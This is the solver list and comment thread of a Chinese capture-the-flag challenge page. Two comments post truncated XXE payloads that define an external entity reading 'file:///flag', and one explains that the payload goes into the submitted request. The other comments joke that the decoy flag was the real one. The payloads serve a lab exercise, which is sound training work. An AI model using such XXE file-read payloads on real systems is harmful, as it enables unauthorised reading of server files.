评分(0)
暂无评分
解题动态
minz 攻破了该题 29天前
xujunjjj 攻破了该题 1月前
wbiao 攻破了该题 3月前
nuxe 攻破了该题 3月前
ssoocc 攻破了该题 4月前
倦鸟叫了一整天 攻破了该题 6月前
amobaishi 攻破了该题 10月前
biandanjun 攻破了该题 12月前
tianna 攻破了该题 1年前
coldplay99999 攻破了该题 1年前
Rg 攻破了该题 1年前
WCRH 攻破了该题 1年前
POEighT 攻破了该题 1年前
wangjf 攻破了该题 1年前
t1tl3d 攻破了该题 1年前
fuhuameng 攻破了该题 1年前
cxy18 攻破了该题 1年前
Ramrem 攻破了该题 1年前
平凡的人 攻破了该题 1年前
评论
MRLD 1年前
举报
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE user [ <!ELEMENT name ANY > <!ENTITY admin SYSTEM "file:///flag" >]> <user><userna
MRLD 1年前
举报
真得出生出题人,假flag是真的,闲的这样搞
gooddemo 1年前
举报
这个是xxe漏洞,所以在点击提交按钮时,修改Payload,内容如下:<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///flag">]> <user><use
hopeinhand 2年前
举报
找半天结果假flag是真的,很迷惑